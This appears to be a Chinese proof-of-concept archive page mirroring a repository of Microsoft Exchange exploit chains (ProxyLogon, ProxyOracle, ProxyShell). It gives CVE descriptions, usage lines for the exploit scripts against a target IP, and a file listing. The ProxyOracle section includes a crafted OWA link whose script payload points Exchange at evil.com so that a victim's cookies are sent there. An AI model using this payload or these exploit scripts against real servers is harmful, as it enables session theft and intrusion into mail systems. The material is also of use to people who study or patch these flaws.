关联漏洞
标题:Microsoft Exchange Server 代码问题漏洞 (CVE-2021-26855)描述:Microsoft Exchange Server是美国微软(Microsoft)公司的一套电子邮件服务程序。它提供邮件存取、储存、转发,语音邮件,邮件过滤筛选等功能。 Microsoft Exchange Server 安全漏洞。攻击者可构造恶意HTTP请求,并通过Exchange Server进行身份验证。进而扫描内网,获取用户敏感信息。以下产品和版本受到影响:Microsoft Exchange Server 2013 Cumulative Update 23,Microsoft Exchange
描述
[ProxyLogon] CVE-2021-26855 & CVE-2021-27065 Fixed RawIdentity Bug Exploit. [ProxyOracle] CVE-2021-31195 & CVE-2021-31196 Exploit Chains. [ProxyShell] CVE-2021-34473 & CVE-2021-34523 & CVE-2021-31207 Exploit Chains.
介绍
# ProxyVulns
### ProxyLogon
`Usage: python3 26855.py 1.1.1.1`
### ProxyOracle
``` url
Once a victim clicks this link, evil.com will receive the cookies.
https://ews.lab/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};document.cookie=`X-AnonResource-Backend=@evil.com:443/path/any.php%23~1941962753`;document.cookie=`X-AnonResource=true`;fetch(`/owa/auth/any.skin`,{credentials:`include`});//
```
``` bash
pip3 install pycryptodome
Usage: python3 31196.py 1.1.1.1 'cadata=xxx; cadataTTL=yyy; ...'
```
### ProxyShell
``` bash
pip3 install pypsrp
Usage: python3 34473.py 1.1.1.1
Usage: python3 31207.py 1.1.1.1 [Local File Path] [UNC Absolute Path]
```
> Not working in some versions target(due to `/@gmail.com` path), maybe fix it later
### Others
- `Cookie: securitytoken=foobar`
- `/owa/calendar/foobar@exchange.local/foobar/owa14.aspx/.js`
## Reference
[ProxyLogon Vulnerability Analysis(Chinese)](https://hosch3n.github.io/2021/08/22/ProxyLogon%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/)
https://docs.microsoft.com/en-us/exchange/architecture/mailbox-servers/recreate-arbitration-mailboxes?view=exchserver-2019
[ProxyOracle Vulnerability Analysis(Chinese)](https://hosch3n.github.io/2021/08/23/ProxyOracle%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/)
https://github.com/mwielgoszewski/python-paddingoracle
[ProxyShell Vulnerability Analysis(Chinese)](https://hosch3n.github.io/2021/08/24/ProxyShell%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/)
文件快照
[4.0K] /data/pocs/08c6cec7e4541827175f431705f14a280c214f0b
├── [9.2K] 26855.py
├── [5.5K] 31196.py
├── [5.9K] 31207.py
├── [7.1K] 34473.py
├── [4.0K] img
│ ├── [1.8M] 26855.png
│ ├── [919K] 31196.png
│ ├── [1.6M] 31207.png
│ └── [1.1M] 34473.png
├── [1.5K] README.md
└── [ 225] users.txt
1 directory, 10 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。